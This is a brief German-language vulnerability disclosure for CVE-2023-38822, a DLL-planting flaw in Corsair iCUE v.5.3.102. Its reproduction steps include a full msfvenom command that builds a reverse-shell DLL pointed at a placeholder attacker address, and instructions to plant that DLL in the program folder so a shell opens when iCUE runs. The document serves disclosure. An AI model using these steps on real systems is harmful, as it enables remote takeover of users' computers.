Corsair---DLL-Planting-CVE-2023-38822
DLL Planting in der Corsair iCUE v.5.3.102 CVE-2023-38822
Entdecker: Idan Malihi
Beschreibung
Ein Problem in Corsair iCUE v.5.3.102 ermöglicht es einem lokalen Angreifer, beliebigen Code über die Komponenten MPDC.dll, CRYPTSP.dll, dcomp.dll, profapi.dll und MSASN1.dll auszuführen.
Schritte zur Reproduktion
Um die DLL-Planting-Schwachstelle auszunutzen, sollte ein Angreifer die folgenden Schritte durchführen:
- Laden Sie die neueste Version von iCUE herunter.
- Installieren Sie das iCUE-Produkt.
- Öffnen Sie den Installationspfad-Ordner, z.B. C:\Program Files\Corsair\Corsair iCUE5 Software\
- Erstellen Sie eine schädliche DLL-Datei mit msfvenom unter Kali Linux OS:
msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
- Übertragen Sie die DLL-Datei in den Pfad des Programms C:\Program Files\Corsair\Corsair iCUE5 Software\
- Führen Sie die iCUE.exe aus und erhalten Sie eine Reverse-Shell.